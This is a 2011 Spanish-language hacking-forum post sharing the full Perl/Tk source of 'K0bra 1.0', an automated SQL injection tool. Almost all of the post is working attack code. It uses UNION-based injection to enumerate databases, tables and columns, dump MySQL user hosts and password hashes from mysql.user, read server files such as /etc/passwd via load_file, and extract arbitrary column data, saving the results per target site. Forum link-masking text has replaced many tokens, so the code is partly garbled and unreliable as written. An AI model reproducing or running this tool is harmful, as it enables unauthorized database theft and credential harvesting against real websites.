comment
IRC Chat
play_arrow
  3. [Perl Tk] K0bra 1.0
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.
« anterior próximo »
Páginas: [1]   Ir Abajo

[Perl Tk] K0bra 1.0

  • 0 Respuestas
  • 989 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil

[Perl Tk] K0bra 1.0

« en: Julio 03, 2011, 10:01:34 pm »
Hola a les dejo un programa para escanear la vulnerabilidad SQL de una forma
avanzada

Opciones

  • Scanea el numero de columnas
  • Busca el numero magico automaticamente y muestra data sobre la DB
  • Dumpea mysql.user
  • Lista bases de datos encontradas , asi como tablas y columnas
  • Permite visualizar archivos con load_file()
  • Codificacion y decodificacion para ascii y hex
  • Dumpea valores sobre cualquier columna
  • Guarda todo los registros en un archivo de texto con el nombre de la web



Imagenes







Código: Perl
  1. #!usr/bin/perl
  2. #K0bra 1.0 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use LWP::UserAgent;
  7. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  8. use Win32;
  9.  
  10. my $bypass = "--";
  11. my $save = "";
  12.  
  13. if ($^O eq 'MSWin32') {
  14. use Win32::Console;
  15. Win32::Console::Free();
  16. }
  17.  
  18. my $nave = LWP::UserAgent->new();
  19. $nave->timeout(5);
  20. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  21.  
  22. my $logo = MainWindow->new();
  23. $logo->title("k0bra 1.0 (C) Doddy Hackman 2011");
  24. $logo->geometry("500x510+20+20");
  25. $logo->resizable(0,0);
  26. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-You are not allowed to view links. Register or Login=>20);
  27. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=")->place(-You are not allowed to view links. Register or Login=>23,-x=>90);
  28. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start)->place(-You are not allowed to view links. Register or Login=>20,-x=>400);
  29. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-You are not allowed to view links. Register or Login=>70);
  30. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs)->place(-You are not allowed to view links. Register or Login=>110,-x=>40);
  31. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb)->place(-You are not allowed to view links. Register or Login=>110,-x=>120);
  32. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb)->place(-You are not allowed to view links. Register or Login=>110,-x=>200);
  33. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow)->place(-You are not allowed to view links. Register or Login=>110,-x=>280);
  34. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile)->place(-You are not allowed to view links. Register or Login=>110,-x=>390);
  35.  
  36. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum)->place(-You are not allowed to view links. Register or Login=>150,-x=>90);
  37. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1)->place(-You are not allowed to view links. Register or Login=>150,-x=>170);
  38. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2)->place(-You are not allowed to view links. Register or Login=>150,-x=>250);
  39. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china)->place(-You are not allowed to view links. Register or Login=>150,-x=>360);
  40.  
  41. $logo->Label(-text=>"Details : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>230,-x=>90);
  42.  
  43. my $informatero = $logo->Listbox(-height=>5,-width=>40)->place(-You are not allowed to view links. Register or Login=>210,-x=>160);
  44.  
  45. $logo->Label(-text=>"Databases",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>60);
  46. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>190);
  47. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>330);
  48.  
  49. my $datero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>40);
  50. my $tablero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>180);
  51. my $columnero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>320);
  52.  
  53. MainLoop;
  54.  
  55. sub start {
  56.  
  57. $informatero->You are not allowed to view links. Register or Login("0.0","end");
  58. $datero->You are not allowed to view links. Register or Login("0.0","end");
  59. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  60. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  61.  
  62. my $tengo = $targetero->get;
  63.  
  64. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($tengo,"--");
  65. if ($control eq 1) {
  66. $logo->update;
  67. $targetero->configure(-text=>$gen);
  68. details($gen,$bypass,$save);
  69. } else {
  70. Win32::MsgBox("Not found length columns",0,"K0bra 1.0");
  71. }
  72. }
  73.  
  74. sub You are not allowed to view links. Register or Login {
  75. my $rows  = "0";
  76. my $asc;
  77. my $page = $_[0];
  78. ($pass1,$pass2) = &bypass($_[1]);
  79. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  80. $code = toma($inyection);
  81. $logo->update;
  82.  
  83. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  84.  
  85. $logo->update;
  86.  
  87. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);
  88. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);
  89.  
  90. unless ($testar1 eq $testar2) {
  91. my $patha = $1;
  92. $logo->update;
  93. You are not allowed to view links. Register or Login $patha;
  94. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  95. $total = "1";
  96. for my $rows(2..200) {
  97. $logo->update;
  98. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  99. $total.= ",".$rows;
  100. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  101. $test = toma($injection);
  102. if ($test=~/RATSXPDOWN/) {
  103. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  104. $control = 1;
  105. my $save = comer($_[0]);
  106. savefile($save.".txt","\n[Target confirmed] : $page");
  107. savefile($save.".txt","[Bypass] : $_[1]\n");
  108. savefile($save.".txt","[Limit] : The site has $rows columns");
  109. savefile($save.".txt","[Data] : The number @number print data");
  110. $informatero->insert("end","[+] The site has $rows columns");
  111. $informatero->insert("end","[+] The number @number print data");
  112. if ($patha) {
  113. savefile($save.".txt","[Full Path Discloure] : $patha");
  114. }
  115. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  116. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  117. You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  118. }
  119. }
  120. }
  121. } else {
  122. Win32::MsgBox("Not vulnerable",0,"K0bra 1.0");
  123. next;
  124. }
  125. }
  126.  
  127. sub details {
  128. my ($page,$bypass,$save) = @_;
  129. ($pass1,$pass2) = &bypass($bypass);
  130. savefile($save.".txt","\n");
  131. if ($page=~/(.*)hackman(.*)/ig) {
  132. my  ($start,$end) = ($1,$2);
  133. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  134. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  135. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  136. $test1 = toma($inforschema);
  137. $test2 = toma($mysqluser);
  138. $informatero->insert("end","");
  139. if ($test2=~/ERTOR854/ig) {
  140. savefile($save.".txt","[mysql.user] : ON");
  141. $informatero->insert("end","[mysql.user] : ON");
  142. } else {
  143. $informatero->insert("end","[mysql.user] : OFF");
  144. savefile($save.".txt","[mysql.user] : OFF");
  145. }
  146. if ($test1=~/ERTOR854/ig) {
  147. $informatero->insert("end","[information_schema.tables] : ON");
  148. savefile($save.".txt","[information_schema.tables] : ON");
  149. } else {
  150. $informatero->insert("end","[information_schema.tables] : OFF");
  151. savefile($save.".txt","[information_schema.tables] : OFF");
  152. }
  153. if ($test3=~/ERTOR854/ig) {
  154. $informatero->insert("end","[load_file] : ON");
  155. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  156. }
  157. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  158. $injection = $start.$concat.$end.$pass2;
  159. $code = toma($injection);
  160. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  161. $informatero->insert("end","");
  162. $informatero->insert("end","[+] DB Version : $1");
  163. $informatero->insert("end","[+] DB Name : $2");
  164. $informatero->insert("end","[+] user_name : $3");
  165. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  166. } else {
  167. Win32::MsgBox("Not Found DB Info",0,"K0bra 1.0");
  168. }
  169. }
  170. }
  171.  
  172.  
  173. sub getdbs {
  174. $datero->You are not allowed to view links. Register or Login("0.0","end");
  175. my $page = $targetero->get;
  176. my $save = comer($page);
  177. my $page1 = $page;
  178. savefile($save.".txt","\n");
  179. ($pass1,$pass2) = &bypass($bypass);
  180. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  181. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  182. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  183. my $limita = $1;
  184. $logo->update;
  185. savefile($save.".txt","[+] Databases Length : $limita\n");
  186. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  187. $real = "1";
  188. for my $limit(0..$limita) {
  189. $logo->update;
  190. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  191. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  192. my $control = $1;
  193. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  194. $datero->insert("end",$control);
  195. savefile($save.".txt","[Database $real Found] : $control");
  196. $real++;
  197. }
  198. }
  199. }
  200. } else {
  201. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  202. }
  203. }
  204.  
  205.  
  206. sub schematablesdb {
  207.  
  208. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  209.  
  210. my $page = $targetero->get;
  211.  
  212. my $save = comer($page);
  213.  
  214. $d = $datero->curselection();
  215.  
  216. for my $id (@$d) {
  217. my $db = $datero->get($id);
  218.  
  219. my $page1 = $page;
  220. savefile($save.".txt","\n");
  221. ($pass1,$pass2) = &bypass($bypass);
  222. savefile($save.".txt","[DB] : $db");
  223. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  224. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  225. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  226. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  227. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  228. $logo->update;
  229. savefile($save.".txt","[+] Tables Length :  $1\n");
  230. my $limit = $1;
  231. $real = "1";
  232. for my $lim(0..$limit) {
  233. $logo->update;
  234. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  235. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  236. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  237. my $table = $1;
  238. You are not allowed to view links. Register or Login $table;
  239. savefile($save.".txt","[Table $real Found : $table ]");
  240. $tablero->insert("end",$db.".".$table);
  241. $real++;
  242. }}
  243. } else {
  244. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  245. }}}
  246.  
  247. sub schemacolumnsdb {
  248.  
  249. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  250.  
  251. my $page = $targetero->get;
  252. my $save = comer($page);
  253.  
  254. $d = $tablero->curselection();
  255.  
  256. for my $id (@$d) {
  257. my $da = $tablero->get($id);
  258.  
  259. if ($da=~/(.*)\.(.*)/) {
  260. my ($db,$table) = ($1,$2);
  261.  
  262. my $page3 = $page;
  263. my $page4 = $page;
  264.  
  265. savefile($save.".txt","\n");
  266. ($pass1,$pass2) = &bypass($bypass);
  267. savefile($save.".txt","\n[DB] : $db");
  268. savefile($save.".txt","[Table] : $table");
  269. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  270. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  271. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  272. savefile($save.".txt","[Columns length : $1 ]\n");
  273. my $si = $1;
  274. You are not allowed to view links. Register or Login $si;
  275. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  276. $real = "1";
  277. for my $limit2(0..$si) {
  278. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  279. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  280. $columnero->insert("end",$1);
  281. savefile($save.".txt","[Column $real] : $1");
  282. $real++;
  283. }
  284. }
  285. } else {
  286. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  287. }
  288. }
  289. }
  290. }
  291.  
  292. sub mynow {
  293.  
  294. my $p = $targetero->get;
  295.  
  296. $mi = MainWindow->new();
  297. $mi->title("Mysql Extractor");
  298. $mi->geometry("500x310+20+20");
  299. $mi->resizable(0,0);
  300.  
  301. $mi->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  302. my $guix = $mi->Entry(-width=>40,-text=>$p)->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  303. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax)->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  304.  
  305. $mi->Label(-text=>"Host",-font=>"Impact1")->place(-x=>60,-You are not allowed to view links. Register or Login=>120);
  306. $mi->Label(-text=>"User",-font=>"Impact1")->place(-x=>200,-You are not allowed to view links. Register or Login=>120);
  307. $mi->Label(-text=>"Password",-font=>"Impact1")->place(-x=>360,-You are not allowed to view links. Register or Login=>120);
  308.  
  309. my $hostero = $mi->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>150,-x=>40);
  310. my $usero = $mi->Listbox(-width=>23)->place(-You are not allowed to view links. Register or Login=>150,-x=>180);
  311. my $pasero = $mi->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>150,-x=>340);
  312.  
  313.  
  314. sub tengorax {
  315.  
  316. my $page = $guix->get;
  317. my $save = comer($page);
  318.  
  319. my $cop = $page;
  320. my $cop1 = $page;
  321. savefile($save.".txt","\n");
  322.  
  323. ($pass1,$pass2) = &bypass($bypass);
  324. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  325. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  326. if ($code=~/RATSXPDOWN/ig){
  327. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  328. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  329. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  330. $mi->update;
  331. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  332. for my $limit(0..$1) {
  333. $mi->update;
  334. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  335. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  336. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  337. $mi->update;
  338. $hostero->insert("end",$1);
  339. $usero->insert("end",$2);
  340. $pasero->insert("end",$3);
  341. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  342. } else {
  343. last;
  344. }}}
  345. } else {
  346. Win32::MsgBox("mysql.user not found",0,"K0bra 1.0");
  347. }
  348. }
  349. }
  350.  
  351. sub myfile {
  352.  
  353. my $pag = $targetero->get;
  354.  
  355. $loa = MainWindow->new();
  356. $loa->title("load_file helper");
  357. $loa->geometry("380x400+20+20");
  358. $loa->resizable(0,0);
  359.  
  360. $loa->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  361. my $aa = $loa->Entry(-width=>40,-text=>$pag)->place(-You are not allowed to view links. Register or Login=>23,-x=>80);
  362. $loa->Label(-text=>"File : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>60,-x=>23);
  363. my $tea = $loa->Entry(-width=>20,-text=>"C:\leer.txt")->place(-You are not allowed to view links. Register or Login=>63,-x=>63);
  364. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno)->place(-You are not allowed to view links. Register or Login=>62,-x=>200);
  365. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena)->place(-You are not allowed to view links. Register or Login=>62,-x=>263);
  366.  
  367. $loa->Label(-text=>"Output",-font=>"Impact1")->place(-x=>160,-You are not allowed to view links. Register or Login=>130);
  368. my $mo = $loa->ROText(-width=>45,-height=>15)->place(-You are not allowed to view links. Register or Login=>170,-x=>25);
  369.  
  370. sub eno {
  371. my $t = $tea->get;
  372. if ($t=~/0x/) {
  373. $tea->configure(-text=>decode($t));
  374. } else {
  375. $tea->configure(-text=>encode($t));
  376. }
  377. }
  378.  
  379. sub ena {
  380.  
  381. $mo->You are not allowed to view links. Register or Login("0.0","end");
  382.  
  383. my $page = $aa->get;
  384. my $save = comer($page);
  385.  
  386. savefile($save.".txt","\n");
  387. ($pass1,$pass2) = &bypass($bypass);
  388. if ($page =~/(.*)hackman(.*)/g) {
  389. my $start = $1; my $end = $2;
  390. my $file = $tea->get;
  391. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
  392. $code = toma($start.$concat.$end.$pass2);
  393. if ($code =~/ERTOR854(.*)ERTOR854/g) {
  394. $mo->insert("end",$1);
  395. savefile($save.".txt","[File Found] : $file");
  396. savefile($save.".txt","\n[Source Start]\n");
  397. savefile($save.".txt","$1");
  398. savefile($save.".txt","\n[Source End]\n");
  399. } else {
  400. Win32::MsgBox("Error",0,"K0bra 1.0");
  401. }}}}
  402.  
  403. sub dum {
  404.  
  405. my $pa = $targetero->get;
  406.  
  407. $max = MainWindow->new();
  408. $max->title("Dump Values");
  409. $max->geometry("480x380+20+20");
  410. $max->resizable(0,0);
  411.  
  412. $max->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  413. my $tata = $max->Entry(-width=>40,-text=>$pa)->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  414.  
  415. $max->Label(-text=>"Table : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>60);
  416. my $tato = $max->Entry(-width=>20)->place(-x=>105,-You are not allowed to view links. Register or Login=>63);
  417.  
  418. $max->Label(-text=>"Column1 : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>90,-x=>50);
  419. my $tatu = $max->Entry(-width=>20)->place(-x=>130,-You are not allowed to view links. Register or Login=>93);
  420.  
  421. $max->Label(-text=>"Column2 : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>130,-x=>50);
  422. my $tita= $max->Entry(-width=>20)->place(-You are not allowed to view links. Register or Login=>133,-x=>130);
  423.  
  424.  
  425. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor)->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  426.  
  427. $max->Label(-text=>"Column1",-font=>"Impact1")->place(-x=>100,-You are not allowed to view links. Register or Login=>180);
  428. $max->Label(-text=>"Column2",-font=>"Impact1")->place(-x=>300,-You are not allowed to view links. Register or Login=>180);
  429.  
  430. my $duta1 = $max->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>210,-x=>70);
  431. my $duta2 = $max->Listbox(-width=>23)->place(-You are not allowed to view links. Register or Login=>210,-x=>260);
  432.  
  433.  
  434. sub tengor {
  435.  
  436. $duta1->You are not allowed to view links. Register or Login("0.0","end");
  437. $duta2->You are not allowed to view links. Register or Login("0.0","end");
  438.  
  439. my $page = $tata->get;
  440. my $tabla = $tato->get;
  441. my $col1 = $tatu->get;
  442. my $col2 = $tita->get;
  443.  
  444. my $save = comer($page);
  445.  
  446. savefile($save.".txt","\n");
  447.  
  448. ($pass1,$pass2) = &bypass($bypass);
  449. if ($page=~/(.*)hackman(.*)/){
  450. my $start = $1;
  451. my $end = $2;
  452. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
  453. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
  454. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
  455. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  456. $tota = $1;
  457. savefile($save.".txt","[Table] : $tabla");
  458. savefile($save.".txt","[+] Length of the rows: $tota\n");
  459. savefile($save.".txt","[$col1] [$col2]\n");
  460. for my $limit(0..$tota) {
  461. You are not allowed to view links. Register or Login $limit;
  462. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
  463. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  464. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
  465. $duta1->insert("end",$1);
  466. $duta2->insert("end",$2);
  467. } else {
  468. last;
  469. }}
  470. } else {
  471. Win32::MsgBox("Error",0,"K0bra 1.0");
  472. }}}}
  473.  
  474. sub per1 {
  475.  
  476. my $he = MainWindow->new();
  477. $he->title("Hex Converter (C) Doddy Hackman 2011");
  478. $he->geometry("420x70+20+20");
  479. $he->resizable(0,0);
  480. $he->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  481. my $cam = $he->Entry(-width=>30)->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  482. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1)->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  483. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2)->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  484.  
  485. sub paso1 {
  486.  
  487. my $caca = $cam->get();
  488. You are not allowed to view links. Register or Login $caca;
  489.  
  490. $cam->configure(-text=>encode($caca));
  491.  
  492. }
  493.  
  494. sub paso2 {
  495.  
  496. my $caca = $cam->get();
  497. You are not allowed to view links. Register or Login $caca;
  498.  
  499. $cam->configure(-text=>decode($caca));
  500.  
  501. }
  502. }
  503.  
  504.  
  505. sub per2 {
  506.  
  507. my $hexae = MainWindow->new();
  508. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
  509. $hexae->geometry("420x70+20+20");
  510. $hexae->resizable(0,0);
  511. $hexae->Label(-text=>"Text : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  512. my $cama = $hexae->Entry(-width=>30)->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  513. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3)->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  514. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4)->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  515.  
  516.  
  517. sub paso3 {
  518.  
  519. my $caca = $cama->get();
  520. You are not allowed to view links. Register or Login $caca;
  521.  
  522. $cama->configure(-text=>ascii($caca));
  523.  
  524. }
  525.  
  526. sub paso4 {
  527.  
  528. my $caca = $cama->get();
  529. You are not allowed to view links. Register or Login $caca;
  530.  
  531. $cama->configure(-text=>ascii_de($caca));
  532.  
  533. }
  534.  
  535. }
  536.  
  537. sub china {
  538. my $de = $targetero->get;
  539. my $save = comer($de);
  540. my $file = $save.".txt";
  541. You are not allowed to view links. Register or Login("start logs/webs/$file");
  542. }
  543.  
  544. sub bypass {
  545. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  546. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  547. else {You are not allowed to view links. Register or Login ("+","--");}}
  548.  
  549. sub ascii {
  550. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  551. }
  552.  
  553. sub ascii_de {
  554. $_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];
  555. You are not allowed to view links. Register or Login $_[0];
  556. }
  557.  
  558.  
  559. sub encode {
  560. my $string = $_[0];
  561. $hex = '0x';
  562. for (You are not allowed to view links. Register or Login //,$string) {
  563. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  564. }
  565. You are not allowed to view links. Register or Login $hex;
  566. }
  567.  
  568. sub decode {
  569. $_[0] =~ s/^0x//;
  570. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $_[0] =~ /../g;
  571. You are not allowed to view links. Register or Login $encode;
  572. }
  573.  
  574.  
  575. sub toma {
  576. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  577. }
  578.  
  579. sub savefile {
  580. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  581. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  582. You are not allowed to view links. Register or Login SAVE;
  583. }
  584.  
  585. sub comer {
  586. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  587. You are not allowed to view links. Register or Login $auth;
  588. }
  589.  
  590. # ¿ The End ?
  591.  
« Última modificación: Julio 17, 2011, 03:43:04 am por Sthefano02 »
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

 Respuestas: 2
Vistas: 3002 		Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

 Respuestas: 1
Vistas: 1406 		Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

 Respuestas: 0
Vistas: 1037 		Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

 Respuestas: 0
Vistas: 1177 		Último mensaje Julio 03, 2011, 09:49:49 pm
